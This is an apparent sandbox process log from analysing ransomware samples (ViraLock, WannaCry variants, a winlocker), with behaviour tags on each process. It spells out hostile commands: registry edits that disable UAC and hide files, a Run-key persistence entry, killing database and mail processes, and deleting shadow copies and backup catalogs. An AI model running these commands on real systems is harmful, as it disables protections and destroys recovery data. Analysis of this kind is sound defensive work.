-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 232⤵
- Modifies registry key
PID:5304
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f32⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tewoscEM.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""32⤵PID:7156
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs33⤵PID:6684
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 130⤵
- Modifies visibility of file extensions in Explorer
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5496
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 230⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4628
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f30⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5644 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV131⤵PID:3488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ywQIQoME.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""30⤵PID:2820
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs31⤵
- System Location Discovery: System Language Discovery
PID:6656
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 128⤵
- Modifies visibility of file extensions in Explorer
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3628
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 228⤵
- Modifies registry key
PID:2640
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f28⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:6680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dooQEgQo.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""28⤵PID:1176
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs29⤵PID:5692
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 126⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1772
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 226⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5908
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f26⤵
- UAC bypass
- Modifies registry key
PID:5884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xWwIwsgE.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""26⤵
- System Location Discovery: System Language Discovery
PID:6928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:416
-
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs27⤵PID:4408
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 124⤵
- Modifies visibility of file extensions in Explorer
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3096
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 224⤵
- Modifies registry key
PID:5268
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f24⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BAkQAYEM.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""24⤵PID:5184
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs25⤵
- System Location Discovery: System Language Discovery
PID:5340
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 122⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:6468
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 222⤵
- Modifies registry key
PID:6476
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f22⤵
- UAC bypass
- Modifies registry key
PID:6676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AYYQkEYw.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""22⤵PID:6756
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs23⤵PID:6168
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 120⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3624
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 220⤵
- Modifies registry key
PID:5848
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f20⤵
- UAC bypass
- Modifies registry key
PID:5932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cqwwIEkI.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""20⤵PID:5156
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs21⤵PID:6188
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 118⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3992
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 218⤵
- Modifies registry key
PID:4404
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f18⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qIIkEosE.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""18⤵
- System Location Discovery: System Language Discovery
PID:2564 -
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs19⤵PID:2096
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 116⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4896
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 216⤵
- Modifies registry key
PID:848
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f16⤵
- UAC bypass
- Modifies registry key
PID:1968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\koAkQkoM.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""16⤵
- System Location Discovery: System Language Discovery
PID:2080 -
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs17⤵PID:1772
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 114⤵
- Modifies visibility of file extensions in Explorer
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1252
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 214⤵
- Modifies registry key
PID:3200
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f14⤵
- UAC bypass
- Modifies registry key
PID:3460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YSEswsUE.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""14⤵PID:3240
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs15⤵
- System Location Discovery: System Language Discovery
PID:3908
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 112⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:4596
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 212⤵
- Modifies registry key
PID:2976
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f12⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FUkcosQA.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""12⤵PID:4808
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs13⤵
- System Location Discovery: System Language Discovery
PID:4196
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 110⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1072
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 210⤵
- Modifies registry key
PID:4804
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f10⤵
- UAC bypass
- Modifies registry key
PID:3960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jAcokgkk.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""10⤵PID:4408
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs11⤵PID:3368
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 18⤵
- Modifies visibility of file extensions in Explorer
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1108
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 28⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4588
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f8⤵
- UAC bypass
- Modifies registry key
PID:4196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qqMMUkAg.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""8⤵
- System Location Discovery: System Language Discovery
PID:4884 -
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs9⤵PID:1252
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 16⤵
- Modifies visibility of file extensions in Explorer
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3752
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 26⤵
- Modifies registry key
PID:1008
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f6⤵
- UAC bypass
- Modifies registry key
PID:2864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iWgcoUQY.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""6⤵PID:4204
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs7⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 14⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2600
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 24⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1656
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f4⤵
- UAC bypass
- Modifies registry key
PID:1708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IOkUAokI.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""4⤵PID:4484
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs5⤵PID:2784
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 12⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1648
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 22⤵
- Modifies registry key
PID:1972
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f2⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dYUwwsok.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""2⤵PID:1000
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs3⤵
- System Location Discovery: System Language Discovery
PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\WannaCry.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\WannaCry.exe"1⤵
- Drops startup file
- Adds Run key to start application
PID:1376 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 89721738404380.bat2⤵PID:576
-
C:\Windows\SysWOW64\cscript.execscript //nologo c.vbs3⤵
- System Location Discovery: System Language Discovery
PID:4940
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe!WannaDecryptor!.exe f2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MSExchange*2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Microsoft.Exchange.*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:772 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1452
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlserver.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlwriter.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe!WannaDecryptor!.exe c2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4328
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b !WannaDecryptor!.exe v2⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe!WannaDecryptor!.exe v3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7152 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:6424
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- System Location Discovery: System Language Discovery
PID:6076
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe!WannaDecryptor!.exe2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:5324
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\WannaCrypt0r.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\WannaCrypt0r.exe"1⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:2340 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:1072
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4804
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 159631738404382.bat2⤵
- System Location Discovery: System Language Discovery
PID:444 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵PID:6708
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3156 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3960
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]PID:476
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6504
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @[email protected] vs2⤵
- System Location Discovery: System Language Discovery
PID:6348 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6468
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:7012 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:2028
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- System Location Discovery: System Language Discovery
PID:1420
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]2⤵
- Executes dropped EXE
PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:676
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qhvfvgsevfiqy755" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\tasksche.exe\"" /f2⤵
- System Location Discovery: System Language Discovery
PID:5776 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qhvfvgsevfiqy755" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:6900
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5184
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]2⤵
- Executes dropped EXE
PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]PID:6752
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]2⤵
- Executes dropped EXE
PID:72
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5580
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5328
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]2⤵
- Executes dropped EXE
PID:1176
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]PID:5408
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5188
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]2⤵
- Executes dropped EXE
PID:7152
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]PID:7004
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5428
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\WinlockerVB6Blacksod.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\WinlockerVB6Blacksod.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4676 -
